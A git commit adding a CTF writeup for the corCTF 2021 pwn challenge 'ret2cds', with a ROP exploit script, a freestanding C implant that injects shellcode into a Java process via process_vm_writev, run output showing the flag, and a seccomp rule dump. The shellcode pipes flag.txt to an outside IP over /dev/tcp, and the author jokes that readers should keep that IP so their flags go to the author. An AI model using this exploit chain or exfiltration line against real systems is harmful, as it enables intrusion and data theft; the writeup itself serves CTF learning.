BLAHAJ/writeups
BLAHAJ
/
writeups
10
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

2021: corctf: ret2cds

This commit is contained in:
xenia 2021-08-23 23:40:55 -04:00
parent 01b330f7d1
commit f80d51be40
20 changed files with 3119 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
2021/corctf/ret2cds/.gitignore vendored Normal file
View File

@ -0,0 +1,2 @@
implant.bin
implant.elf

519
2021/corctf/ret2cds/README.md Normal file
View File

@ -0,0 +1,519 @@
# ret2cds
by [haskal](https://awoo.systems)
pwn / 497 pts / 6 solves
>Pwners keep joking about dropping socat and xinetd 0 days so I rewrote netcat in java. I dare you
>to pop a shell on me now :^)
>
>https://ret2cds.be.ax/
>
>NOTE: Internet is enabled, please use the provided qemu image, and note that this has been tested to
>work in a Debian environment for the Docker host. An Ubuntu host is known to have issues with the
>official solution for the challenge. If you are on Debian, the docker deployment should work for you
>if you don't want to use the qemu image (but not guaranteed).
>
>QEMU Image: ret2cds-qemu.qcow2.gz
>
>QEMU Example: qemu-system-x86_64 -enable-kvm -serial mon:stdio -hda ret2cds.qcow2 -nographic -smp 1
>-m 1G -net user,hostfwd=tcp::1337-:1337 -net nic
>
>QEMU Username: root (no password)
>
>Docker: ret2cds.tar
provided files (i'm only providing the binaries here not the whole qemu image cause that is huge):
[ret2cds/](ret2cds/)
## solution
pwn time
basic analysis of the binary shows that it is using seccomp (also, there is seccomp on the docker
image used for the challenge, but the binary's seccomp rules are much more restrictive)
here's the main function in the dragn
![main function, it's literally just a 512 byte read into a 256 byte buffer](main.png)
yea
ok so first let's get the seccomp rules. for this i used
<https://github.com/david942j/seccomp-tools> and just like, had it run the binary, (yes i probably
shouldn't be running CTF binaries on my actual machine but shush)
this produces output [analysis/ret2cds-seccomp.txt](analysis/ret2cds-seccomp.txt). well... most
things are banned
so what isn't banned? since the docker contains its own seccomp config, we cross-reference what is
allowed there with what is banned here and find 2 interesting calls which are allowed by both sets
of configurations
- `process_vm_readv`
- `process_vm_writev`
these are syscalls that allow reading and writing another process's memory given we have ptrace
permission (in docker everything is root, and also the docker config explicitly adds the ptrace
capability, so yes)
## initial pwning
ok we'll get to this later. first we need to bonk the ret2cds process. it's pretty standard just
write the address of write in order to leak the libc base, then jump back to main, then make a
second rop chain to call mmap in libc
well this part got kind of weird, because pwntools ROP could not identify a good gadget to get
control of r9 which was needed to be set to 0 since it's the offset parameter for mmap (r8 garbage
is OK, it gets ignored for anonymous maps by the kernel). so i turn to my trusty uber-ROP gadget
which is `setcontext` (it's a libc call for restoring all registers from a struct on the stack, goes
with `getcontext`). by manual analysis there is a good place to jump into `setcontext` in order to
get control of r9
```asm
// ( in setcontext )
001581e1 4c 8b 4a 30 MOV R9,qword ptr [RDX + 0x30]
001581e5 48 8b 92 MOV RDX,qword ptr [RDX + 0x88]
88 00 00 00
001581ec 31 c0 XOR EAX,EAX
001581ee c3 RET
```
for this we just need `RDX` to be loaded as a pointer to the memory we want to load from, which is
easy cause we have gadgets for `RDX`. we pass in a pointer to some random part of `rodata` such that
the address `r9` gets loaded from ends up being `0`
here's the code so far
```python
elf = ELF("./ret2cds")
rop = ROP(elf)
rop.write(1, elf.got['write'])
libc = ELF("./libc.so.6")
r = remote("ret2cds.be.ax", 38255)
r.recvuntil("warden: ")
# step 1: get write to print the address of write, then go back to main (0x0040123a)
r.sendline(b"A"*256 + b"AAAAAAAA" + rop.chain() + p64(0x0040123a))
print(r.recvline())
print(r.recvline())
leak = r.recvline()[1:8]
leak = u64(leak.ljust(8, b'\x00'))
print(hex(leak))
libc_base = leak - libc.symbols['write']
print(hex(libc_base))
libc.address = libc_base
# now, make part of the ROP for mmap with pwntools
libc_rop = ROP(libc)
# memorize these args lol, that's
# - addr
# - size
# - 7: PROT_READ | PROT_WRITE | PROT_EXECUTE
# - 0x32: MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE
# - -1: no fd
# - 0: no offset
libc_rop.mmap(0x133713370000, 0x10000, 7, 0x32) #, -1, 0)
# read moar shellcode into it
libc_rop.read(0, 0x133713370000, 0x10000)
# handle those pesky remaining args (well, just the last one)
# see the assembly for this gadget above
fucky_r9_gadget = p64(0x581e1 + libc_base)
# load rdx with a pointer to rodata (convenient source of 0x0s) offset so that r9 gets
pre_rop = ROP(libc)
pre_rop.rdx = 0x402008 - 0x30
# send step 2 exploit, then jump to the shellcode we just mapped
r.sendline(b"A"*256 + b"AAAAAAAA" + pre_rop.chain() + fucky_r9_gadget + libc_rop.chain() + p64(0x133713370000))
```
now we have shellcode. but there's still seccomp.....
we can produce the final shellcode tho. it just won't work yet because execve is not allowed
(neither is like, anything bash would be running here)
```python
stage3 = asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/44.44.127.10/1337"], {}))
```
please note: if you are doing CTFs in the future referencing this writeup, make sure to keep the IP
address `44.44.127.10` so that i get yr flags >:3
ok so the path should be clear: use `process_vm_writev` in order to write _more shellcode_ into
_another process_
the only other process is the java netcat replacement
yikes,
the java code itself is not that interesting, and not exploitable as far as i can tell. if you're
interested, you can take a look in [Bytecode Viewer](https://github.com/Konloch/bytecode-viewer) or
[JDA](https://github.com/LLVM-but-worse/java-disassembler)[^1]
from looking at that quickly on the qemu environment, we find something interesting in
`/proc/<pid>/maps` for the java process
```
800000000-800002000 rwxp 00001000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa
800002000-8003b9000 rw-p 00003000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa
8003b9000-800a95000 r--p 003ba000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa
800a95000-800a96000 rw-p 00a96000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa
800a96000-8010a3000 r--p 00a97000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa
```
`classes.jsa` has an `rwx` mapping at what looks like a fixed address... that's a great target for
shellcode[^2]
i'm not super interested in shellcoding a call to `process_vm_writev` ... would be convenient to
write it in C, but i also don't have or want to have (legitimate or illegitimate) a binja license
for their shellcode compiler...
## how 2 make a C implant 2021 tutorial working (no robux)
set it to 136 bpm
make a linker script. it's gonna start at the address where your `mmap` shellcode page is
```ld
ENTRY(_start)
MEMORY
{
RAM (rwx) : ORIGIN = 0x133713370000, LENGTH = 0x10000
}
SECTIONS
{
.text :
{
*(.text.start)
*(.text*)
}
.rodata :
{
*(.rodata*)
}
.data :
{
*(.data*)
}
.bss :
{
_bss = .;
*(.bss*)
*(COMMON)
_ebss = .;
}
}
```
now make a makefile (for convenience). we want to call gcc with the magic spell `-nostdlib
-nodefaultlibs -nostdinc -fpic -fno-stack-protector -Os -T stage2.ld`
basically that's
- don't use any stdlib or standard headers
- make position independent code, skip the stack protector
- optimize for size
- use the given linker script
then objcopy that into a flat binary
```make
.PHONY: all clean copy
CC=gcc
OBJCOPY=objcopy
all: implant.bin
clean:
$(RM) *.bin *.elf
implant.bin: implant.elf
$(OBJCOPY) -O binary $< $@
implant.elf: stage2.c stage2.ld
$(CC) -nostdlib -nodefaultlibs -nostdinc -T stage2.ld -fpic -fno-stack-protector \
-Os -std=gnu11 -Wall -Wextra -o $@ $<
```
add some reverb, and stack the layers
here's some boilerplate C. fun fact, your entrypoint just needs to be at the beginning and it needs
to wipe `.bss` then jump to main. but we also need to redefine literally everything because we opted
to not have any standard headers (this is technically unnecessary, you can use the headers if you
want)
```c
typedef unsigned char uint8_t;
_Static_assert(sizeof(uint8_t) == 1, "uint8_t wrong size");
typedef unsigned short uint16_t;
_Static_assert(sizeof(uint16_t) == 2, "uint16_t wrong size");
typedef unsigned int uint32_t;
_Static_assert(sizeof(uint32_t) == 4, "uint32_t wrong size");
typedef unsigned long long uint64_t;
_Static_assert(sizeof(uint64_t) == 8, "uint64_t wrong size");
typedef unsigned int size_t;
typedef int ssize_t;
#define NULL ((void*)0x0)
#define pid_t unsigned long
#define true 1
#define false 0
#define SYS_exit 1
#define SYS_read 0
#define SYS_write 1
#define SYS_process_vm_readv 310
#define SYS_process_vm_writev 311
int main();
void __attribute__((noreturn)) exit(int);
void* memset(void* dst, int val, size_t size) {
for (size_t i = 0; i < size; i++) {
((uint8_t*)dst)[i] = val;
}
return dst;
}
void* memcpy(void* dst, const void* src, size_t size) {
for (size_t i = 0; i < size; i++) {
((uint8_t*)dst)[i] = ((uint8_t*)src)[i];
}
return dst;
}
extern uint8_t _bss;
extern uint8_t _ebss;
void __attribute__((noreturn)) __attribute__((section(".text.start"))) _start() {
// wipe .bss
memset(&_bss, 0, (&_ebss) - (&_bss));
// go to main!
exit(main());
}
int main() {
// your code here!!!
while(true){}
return 120;
}
```
ok now that's done, write some syscall wrappers (i'm being very extra with this)
```c
ssize_t read(int _fd, void* _buf, size_t _len) {
register int fd asm("rdi") = _fd;
register void* buf asm("rsi") = _buf;
register size_t len asm("rdx") = _len;
register int syscall asm("rax") = SYS_read;
register ssize_t ret asm("rax");
asm volatile("syscall" : "=r"(ret) : "r"(fd), "r"(buf), "r"(len), "r"(syscall) : "memory");
return ret;
}
void write(int _fd, const void* _buf, size_t _len) {
register int fd asm("rdi") = _fd;
register const void* buf asm("rsi") = _buf;
register size_t len asm("rdx") = _len;
register int syscall asm("rax") = SYS_write;
asm volatile("syscall" :: "r"(fd), "r"(buf), "r"(len), "r"(syscall) : "memory");
}
void __attribute__((noreturn)) exit(int _code) {
register int code asm("rdi") = _code;
register int syscall asm("rax") = SYS_exit;
asm volatile("syscall" :: "r"(code), "r"(syscall) : "memory");
__builtin_unreachable();
}
ssize_t process_vm_readv(pid_t _pid,
const struct iovec *_local_iov,
unsigned long _liovcnt,
const struct iovec *_remote_iov,
unsigned long _riovcnt,
unsigned long _flags) {
register pid_t pid asm("rdi") = _pid;
register struct iovec* local_iov asm("rsi") = _local_iov;
register unsigned long liovcnt asm("rdx") = _liovcnt;
register struct iovec* remote_iov asm("r10") = _remote_iov;
register unsigned long riovcnt asm("r8") = _riovcnt;
register unsigned long flags asm("r9") = _flags;
register int syscall asm("rax") = SYS_process_vm_readv;
register ssize_t ret asm("rax");
asm volatile("syscall" : "=r"(ret) : "r"(pid), "r"(local_iov), "r"(liovcnt), "r"(remote_iov),
"r"(riovcnt), "r"(flags), "r"(syscall) : "memory");
return ret;
}
ssize_t process_vm_writev(pid_t _pid,
const struct iovec *_local_iov,
unsigned long _liovcnt,
const struct iovec *_remote_iov,
unsigned long _riovcnt,
unsigned long _flags) {
register pid_t pid asm("rdi") = _pid;
register struct iovec* local_iov asm("rsi") = _local_iov;
register unsigned long liovcnt asm("rdx") = _liovcnt;
register struct iovec* remote_iov asm("r10") = _remote_iov;
register unsigned long riovcnt asm("r8") = _riovcnt;
register unsigned long flags asm("r9") = _flags;
register int syscall asm("rax") = SYS_process_vm_writev;
register ssize_t ret asm("rax");
asm volatile("syscall" : "=r"(ret) : "r"(pid), "r"(local_iov), "r"(liovcnt), "r"(remote_iov),
"r"(riovcnt), "r"(flags), "r"(syscall) : "memory");
return ret;
}
```
ok _now_ we're ready to send the shellcode using `process_vm_writev`
## how 2 iovec 2021 tutorial working (no robux)
so if you've never seen iovecs (first of all you should try kernel pwn, you'll definitely see
iovecs,) basically it's a way to read and/or write multiple addresses in sequence with one syscall.
you pass in an array of these structs
```c
struct iovec {
void *iov_base; /* Starting address */
size_t iov_len; /* Number of bytes to transfer */
};
```
that's how `process_vm_readv` and `process_vm_writev` are working
now there's one more small detail, which is that we don't know what PID java has. luckily it's low
(usually <10) so we can just spray the shellcode at every process and eventually java will be hit
```c
// this is: asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/35.237.4.96/1337"], {}))
char* buf = "shellcode here";
char buf2[0x2000];
// write to the previously determined rwx pages in the java process
struct iovec remote_vec = { (void*)0x800000000, 0x2000 };
// read from a local shellcode buf
struct iovec local_vec = { &buf2[0], 0x2000 };
int main() {
print("implant is booted\n");
// fill nop sled (0x90 is NOP)
memset(buf2, 0x90, 0x2000);
// add the shellcode at the end
memcpy(&buf2[0x2000 - 186], buf, 186);
for (int i = 2; i < 100; i++) {
print("sending to pid:");
print_int(i);
print("\n");
ssize_t ret = process_vm_writev(i, &local_vec, 1, &remote_vec, 1, 0);
if (ret <= 0) {
print("bad ret!: ");
print_int(-ret);
print("\n");
} else {
print("GOOD RET\n");
break;
}
}
print("injection complete\n");
while(true){}
return 120;
}
```
finally you'll probably need to connect to the endpoint again, in order to trigger the java process
to enter the rwx page and execute your shellcode
the results:
```
python3 exploit.py
[*] '.../ret2cds'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x3ff000)
RUNPATH: b'./'
[*] Loaded 14 cached gadgets for '../challenge/chall/ret2cds'
0x0000: 0x40131b pop rdi; ret
0x0008: 0x1 [arg0] rdi = 1
0x0010: 0x401319 pop rsi; pop r15; ret
0x0018: 0x403fc0 [arg1] rsi = got.write
0x0020: b'iaaajaaa' <pad r15>
0x0028: 0x401030 write
[*] '.../libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
0x111040
[+] Opening connection to ret2cds.be.ax on port 34485: Done
b'\x00\n'
b"lol, you ain't escaping...\n"
0x7f5b8856e040
0x7f5b8845d000
[*] Loaded 200 cached gadgets for '../challenge/chall/libc.so.6'
0x0000: 0x7f5b8856256d pop rdx; pop rcx; pop rbx; ret
0x0008: 0x7 [arg2] rdx = 7
0x0010: 0x32 [arg3] rcx = 50
0x0018: b'gaaahaaa' <pad rbx>
0x0020: 0x7f5b88484529 pop rsi; ret
0x0028: 0x10000 [arg1] rsi = 65536
0x0030: 0x7f5b88483b72 pop rdi; ret
0x0038: 0x133713370000 [arg0] rdi = 21127266500608
0x0040: 0x7f5b88578890 mmap
0x0048: 0x7f5b885791e1 pop rdx; pop r12; ret
0x0050: 0x10000 [arg2] rdx = 65536
0x0058: b'waaaxaaa' <pad r12>
0x0060: 0x7f5b88484529 pop rsi; ret
0x0068: 0x133713370000 [arg1] rsi = 21127266500608
0x0070: 0x7f5b88483b72 pop rdi; ret
0x0078: 0x0 [arg0] rdi = 0
0x0080: 0x7f5b8856dfa0 read
b'm%V\x88[\x7f\x00\x00\x07\x00\x00\x00\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00gaaahaaa)EH\x88[\x7f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00r;H\x88[\x7f\x00\x00\x00\x007\x137\x13\x00\x00\x90\x88W\x88[\x7f\x00\x00\xe1\x91W\x88[\x7f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00waaaxaaa)
EH\x88[\x7f\x00\x00\x00\x007\x137\x13\x00\x00r;H\x88[\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xdfV\x88[\x7f\x00\x00'
make: Nothing to be done for 'all'.
[*] Switching to interactive mode
🚨 Due to the recent security breaches, we have no choice but to lock you up in jail! 🚨
And just to avoid all those socat/xinetd 0-days you and your pwn friends brag about...
I rewrote netcat in Java ☕.
Nothing can go wrong with a language used on over 13 billion devices ™.
\x00nter your appeal to the warden: \x00
lol, you ain't escaping...
\x00[*] Got EOF while reading in interactive
$
[*] Closed connection to ret2cds.be.ax port 34485
[*] Got EOF while sending in interactive
```
meanwhile on yr listening server
```
$ while true; do nc -vlp 1337; done
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 161.35.128.177.
Ncat: Connection from 161.35.128.177:43098.
corctf{r0p_t0_5h3llc0d3_t0_pWn1n1g_j@v@_rwX_cDs_af179e546321dfac13370}
```
(idk what the 'cds' part of the challege name is supposed to mean. return to 💿?)
[^1]: JDA is just a cleaned up and slightly prettified fork of Bytecode Viewer, but it's also behind
Bytecode Viewer in terms of a few features (mainly Android)
[^2]: in recent versions of openjdk, this is no longer the case (i think). sad :(
luckily this challenge is using an older version

651
2021/corctf/ret2cds/analysis/ret2cds-seccomp.txt Normal file
View File

@ -0,0 +1,651 @@
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x01 0x00 0xc000003e if (A == ARCH_X86_64) goto 0003
0002: 0x06 0x00 0x00 0x00000000 return KILL
0003: 0x20 0x00 0x00 0x00000000 A = sys_number
0004: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0006
0005: 0x06 0x00 0x00 0x00000000 return KILL
0006: 0x15 0x00 0x01 0x00000002 if (A != open) goto 0008
0007: 0x06 0x00 0x00 0x00000000 return KILL
0008: 0x15 0x00 0x01 0x00000003 if (A != close) goto 0010
0009: 0x06 0x00 0x00 0x00000000 return KILL
0010: 0x15 0x00 0x01 0x00000004 if (A != stat) goto 0012
0011: 0x06 0x00 0x00 0x00000000 return KILL
0012: 0x15 0x00 0x01 0x00000005 if (A != fstat) goto 0014
0013: 0x06 0x00 0x00 0x00000000 return KILL
0014: 0x15 0x00 0x01 0x00000006 if (A != lstat) goto 0016
0015: 0x06 0x00 0x00 0x00000000 return KILL
0016: 0x15 0x00 0x01 0x00000007 if (A != poll) goto 0018
0017: 0x06 0x00 0x00 0x00000000 return KILL
0018: 0x15 0x00 0x01 0x00000008 if (A != lseek) goto 0020
0019: 0x06 0x00 0x00 0x00000000 return KILL
0020: 0x15 0x00 0x01 0x0000000c if (A != brk) goto 0022
0021: 0x06 0x00 0x00 0x00000000 return KILL
0022: 0x15 0x00 0x01 0x0000000d if (A != rt_sigaction) goto 0024
0023: 0x06 0x00 0x00 0x00000000 return KILL
0024: 0x15 0x00 0x01 0x0000000e if (A != rt_sigprocmask) goto 0026
0025: 0x06 0x00 0x00 0x00000000 return KILL
0026: 0x15 0x00 0x01 0x0000000f if (A != rt_sigreturn) goto 0028
0027: 0x06 0x00 0x00 0x00000000 return KILL
0028: 0x15 0x00 0x01 0x00000010 if (A != ioctl) goto 0030
0029: 0x06 0x00 0x00 0x00000000 return KILL
0030: 0x15 0x00 0x01 0x00000011 if (A != pread64) goto 0032
0031: 0x06 0x00 0x00 0x00000000 return KILL
0032: 0x15 0x00 0x01 0x00000012 if (A != pwrite64) goto 0034
0033: 0x06 0x00 0x00 0x00000000 return KILL
0034: 0x15 0x00 0x01 0x00000013 if (A != readv) goto 0036
0035: 0x06 0x00 0x00 0x00000000 return KILL
0036: 0x15 0x00 0x01 0x00000014 if (A != writev) goto 0038
0037: 0x06 0x00 0x00 0x00000000 return KILL
0038: 0x15 0x00 0x01 0x00000015 if (A != access) goto 0040
0039: 0x06 0x00 0x00 0x00000000 return KILL
0040: 0x15 0x00 0x01 0x00000016 if (A != pipe) goto 0042
0041: 0x06 0x00 0x00 0x00000000 return KILL
0042: 0x15 0x00 0x01 0x00000017 if (A != select) goto 0044
0043: 0x06 0x00 0x00 0x00000000 return KILL
0044: 0x15 0x00 0x01 0x00000018 if (A != sched_yield) goto 0046
0045: 0x06 0x00 0x00 0x00000000 return KILL
0046: 0x15 0x00 0x01 0x00000019 if (A != mremap) goto 0048
0047: 0x06 0x00 0x00 0x00000000 return KILL
0048: 0x15 0x00 0x01 0x0000001a if (A != msync) goto 0050
0049: 0x06 0x00 0x00 0x00000000 return KILL
0050: 0x15 0x00 0x01 0x0000001b if (A != mincore) goto 0052
0051: 0x06 0x00 0x00 0x00000000 return KILL
0052: 0x15 0x00 0x01 0x0000001c if (A != madvise) goto 0054
0053: 0x06 0x00 0x00 0x00000000 return KILL
0054: 0x15 0x00 0x01 0x0000001d if (A != shmget) goto 0056
0055: 0x06 0x00 0x00 0x00000000 return KILL
0056: 0x15 0x00 0x01 0x0000001e if (A != shmat) goto 0058
0057: 0x06 0x00 0x00 0x00000000 return KILL
0058: 0x15 0x00 0x01 0x0000001f if (A != shmctl) goto 0060
0059: 0x06 0x00 0x00 0x00000000 return KILL
0060: 0x15 0x00 0x01 0x00000020 if (A != dup) goto 0062
0061: 0x06 0x00 0x00 0x00000000 return KILL
0062: 0x15 0x00 0x01 0x00000021 if (A != dup2) goto 0064
0063: 0x06 0x00 0x00 0x00000000 return KILL
0064: 0x15 0x00 0x01 0x00000022 if (A != pause) goto 0066
0065: 0x06 0x00 0x00 0x00000000 return KILL
0066: 0x15 0x00 0x01 0x00000023 if (A != nanosleep) goto 0068
0067: 0x06 0x00 0x00 0x00000000 return KILL
0068: 0x15 0x00 0x01 0x00000024 if (A != getitimer) goto 0070
0069: 0x06 0x00 0x00 0x00000000 return KILL
0070: 0x15 0x00 0x01 0x00000025 if (A != alarm) goto 0072
0071: 0x06 0x00 0x00 0x00000000 return KILL
0072: 0x15 0x00 0x01 0x00000026 if (A != setitimer) goto 0074
0073: 0x06 0x00 0x00 0x00000000 return KILL
0074: 0x15 0x00 0x01 0x00000027 if (A != getpid) goto 0076
0075: 0x06 0x00 0x00 0x00000000 return KILL
0076: 0x15 0x00 0x01 0x00000028 if (A != sendfile) goto 0078
0077: 0x06 0x00 0x00 0x00000000 return KILL
0078: 0x15 0x00 0x01 0x00000029 if (A != socket) goto 0080
0079: 0x06 0x00 0x00 0x00000000 return KILL
0080: 0x15 0x00 0x01 0x0000002a if (A != connect) goto 0082
0081: 0x06 0x00 0x00 0x00000000 return KILL
0082: 0x15 0x00 0x01 0x0000002b if (A != accept) goto 0084
0083: 0x06 0x00 0x00 0x00000000 return KILL
0084: 0x15 0x00 0x01 0x0000002c if (A != sendto) goto 0086
0085: 0x06 0x00 0x00 0x00000000 return KILL
0086: 0x15 0x00 0x01 0x0000002d if (A != recvfrom) goto 0088
0087: 0x06 0x00 0x00 0x00000000 return KILL
0088: 0x15 0x00 0x01 0x0000002e if (A != sendmsg) goto 0090
0089: 0x06 0x00 0x00 0x00000000 return KILL
0090: 0x15 0x00 0x01 0x0000002f if (A != recvmsg) goto 0092
0091: 0x06 0x00 0x00 0x00000000 return KILL
0092: 0x15 0x00 0x01 0x00000030 if (A != shutdown) goto 0094
0093: 0x06 0x00 0x00 0x00000000 return KILL
0094: 0x15 0x00 0x01 0x00000031 if (A != bind) goto 0096
0095: 0x06 0x00 0x00 0x00000000 return KILL
0096: 0x15 0x00 0x01 0x00000032 if (A != listen) goto 0098
0097: 0x06 0x00 0x00 0x00000000 return KILL
0098: 0x15 0x00 0x01 0x00000033 if (A != getsockname) goto 0100
0099: 0x06 0x00 0x00 0x00000000 return KILL
0100: 0x15 0x00 0x01 0x00000034 if (A != getpeername) goto 0102
0101: 0x06 0x00 0x00 0x00000000 return KILL
0102: 0x15 0x00 0x01 0x00000035 if (A != socketpair) goto 0104
0103: 0x06 0x00 0x00 0x00000000 return KILL
0104: 0x15 0x00 0x01 0x00000036 if (A != setsockopt) goto 0106
0105: 0x06 0x00 0x00 0x00000000 return KILL
0106: 0x15 0x00 0x01 0x00000037 if (A != getsockopt) goto 0108
0107: 0x06 0x00 0x00 0x00000000 return KILL
0108: 0x15 0x00 0x01 0x00000038 if (A != clone) goto 0110
0109: 0x06 0x00 0x00 0x00000000 return KILL
0110: 0x15 0x00 0x01 0x00000039 if (A != fork) goto 0112
0111: 0x06 0x00 0x00 0x00000000 return KILL
0112: 0x15 0x00 0x01 0x0000003a if (A != vfork) goto 0114
0113: 0x06 0x00 0x00 0x00000000 return KILL
0114: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0116
0115: 0x06 0x00 0x00 0x00000000 return KILL
0116: 0x15 0x00 0x01 0x0000003d if (A != wait4) goto 0118
0117: 0x06 0x00 0x00 0x00000000 return KILL
0118: 0x15 0x00 0x01 0x0000003e if (A != kill) goto 0120
0119: 0x06 0x00 0x00 0x00000000 return KILL
0120: 0x15 0x00 0x01 0x0000003f if (A != uname) goto 0122
0121: 0x06 0x00 0x00 0x00000000 return KILL
0122: 0x15 0x00 0x01 0x00000040 if (A != semget) goto 0124
0123: 0x06 0x00 0x00 0x00000000 return KILL
0124: 0x15 0x00 0x01 0x00000041 if (A != semop) goto 0126
0125: 0x06 0x00 0x00 0x00000000 return KILL
0126: 0x15 0x00 0x01 0x00000042 if (A != semctl) goto 0128
0127: 0x06 0x00 0x00 0x00000000 return KILL
0128: 0x15 0x00 0x01 0x00000043 if (A != shmdt) goto 0130
0129: 0x06 0x00 0x00 0x00000000 return KILL
0130: 0x15 0x00 0x01 0x00000044 if (A != msgget) goto 0132
0131: 0x06 0x00 0x00 0x00000000 return KILL
0132: 0x15 0x00 0x01 0x00000045 if (A != msgsnd) goto 0134
0133: 0x06 0x00 0x00 0x00000000 return KILL
0134: 0x15 0x00 0x01 0x00000046 if (A != msgrcv) goto 0136
0135: 0x06 0x00 0x00 0x00000000 return KILL
0136: 0x15 0x00 0x01 0x00000047 if (A != msgctl) goto 0138
0137: 0x06 0x00 0x00 0x00000000 return KILL
0138: 0x15 0x00 0x01 0x00000048 if (A != fcntl) goto 0140
0139: 0x06 0x00 0x00 0x00000000 return KILL
0140: 0x15 0x00 0x01 0x00000049 if (A != flock) goto 0142
0141: 0x06 0x00 0x00 0x00000000 return KILL
0142: 0x15 0x00 0x01 0x0000004a if (A != fsync) goto 0144
0143: 0x06 0x00 0x00 0x00000000 return KILL
0144: 0x15 0x00 0x01 0x0000004b if (A != fdatasync) goto 0146
0145: 0x06 0x00 0x00 0x00000000 return KILL
0146: 0x15 0x00 0x01 0x0000004c if (A != truncate) goto 0148
0147: 0x06 0x00 0x00 0x00000000 return KILL
0148: 0x15 0x00 0x01 0x0000004d if (A != ftruncate) goto 0150
0149: 0x06 0x00 0x00 0x00000000 return KILL
0150: 0x15 0x00 0x01 0x0000004e if (A != getdents) goto 0152
0151: 0x06 0x00 0x00 0x00000000 return KILL
0152: 0x15 0x00 0x01 0x0000004f if (A != getcwd) goto 0154
0153: 0x06 0x00 0x00 0x00000000 return KILL
0154: 0x15 0x00 0x01 0x00000050 if (A != chdir) goto 0156
0155: 0x06 0x00 0x00 0x00000000 return KILL
0156: 0x15 0x00 0x01 0x00000051 if (A != fchdir) goto 0158
0157: 0x06 0x00 0x00 0x00000000 return KILL
0158: 0x15 0x00 0x01 0x00000052 if (A != rename) goto 0160
0159: 0x06 0x00 0x00 0x00000000 return KILL
0160: 0x15 0x00 0x01 0x00000053 if (A != mkdir) goto 0162
0161: 0x06 0x00 0x00 0x00000000 return KILL
0162: 0x15 0x00 0x01 0x00000054 if (A != rmdir) goto 0164
0163: 0x06 0x00 0x00 0x00000000 return KILL
0164: 0x15 0x00 0x01 0x00000055 if (A != creat) goto 0166
0165: 0x06 0x00 0x00 0x00000000 return KILL
0166: 0x15 0x00 0x01 0x00000056 if (A != link) goto 0168
0167: 0x06 0x00 0x00 0x00000000 return KILL
0168: 0x15 0x00 0x01 0x00000057 if (A != unlink) goto 0170
0169: 0x06 0x00 0x00 0x00000000 return KILL
0170: 0x15 0x00 0x01 0x00000058 if (A != symlink) goto 0172
0171: 0x06 0x00 0x00 0x00000000 return KILL
0172: 0x15 0x00 0x01 0x00000059 if (A != readlink) goto 0174
0173: 0x06 0x00 0x00 0x00000000 return KILL
0174: 0x15 0x00 0x01 0x0000005a if (A != chmod) goto 0176
0175: 0x06 0x00 0x00 0x00000000 return KILL
0176: 0x15 0x00 0x01 0x0000005b if (A != fchmod) goto 0178
0177: 0x06 0x00 0x00 0x00000000 return KILL
0178: 0x15 0x00 0x01 0x0000005c if (A != chown) goto 0180
0179: 0x06 0x00 0x00 0x00000000 return KILL
0180: 0x15 0x00 0x01 0x0000005d if (A != fchown) goto 0182
0181: 0x06 0x00 0x00 0x00000000 return KILL
0182: 0x15 0x00 0x01 0x0000005e if (A != lchown) goto 0184
0183: 0x06 0x00 0x00 0x00000000 return KILL
0184: 0x15 0x00 0x01 0x0000005f if (A != umask) goto 0186
0185: 0x06 0x00 0x00 0x00000000 return KILL
0186: 0x15 0x00 0x01 0x00000061 if (A != getrlimit) goto 0188
0187: 0x06 0x00 0x00 0x00000000 return KILL
0188: 0x15 0x00 0x01 0x00000062 if (A != getrusage) goto 0190
0189: 0x06 0x00 0x00 0x00000000 return KILL
0190: 0x15 0x00 0x01 0x00000063 if (A != sysinfo) goto 0192
0191: 0x06 0x00 0x00 0x00000000 return KILL
0192: 0x15 0x00 0x01 0x00000064 if (A != times) goto 0194
0193: 0x06 0x00 0x00 0x00000000 return KILL
0194: 0x15 0x00 0x01 0x00000065 if (A != ptrace) goto 0196
0195: 0x06 0x00 0x00 0x00000000 return KILL
0196: 0x15 0x00 0x01 0x00000066 if (A != getuid) goto 0198
0197: 0x06 0x00 0x00 0x00000000 return KILL
0198: 0x15 0x00 0x01 0x00000067 if (A != syslog) goto 0200
0199: 0x06 0x00 0x00 0x00000000 return KILL
0200: 0x15 0x00 0x01 0x00000068 if (A != getgid) goto 0202
0201: 0x06 0x00 0x00 0x00000000 return KILL
0202: 0x15 0x00 0x01 0x00000069 if (A != setuid) goto 0204
0203: 0x06 0x00 0x00 0x00000000 return KILL
0204: 0x15 0x00 0x01 0x0000006a if (A != setgid) goto 0206
0205: 0x06 0x00 0x00 0x00000000 return KILL
0206: 0x15 0x00 0x01 0x0000006b if (A != geteuid) goto 0208
0207: 0x06 0x00 0x00 0x00000000 return KILL
0208: 0x15 0x00 0x01 0x0000006c if (A != getegid) goto 0210
0209: 0x06 0x00 0x00 0x00000000 return KILL
0210: 0x15 0x00 0x01 0x0000006d if (A != setpgid) goto 0212
0211: 0x06 0x00 0x00 0x00000000 return KILL
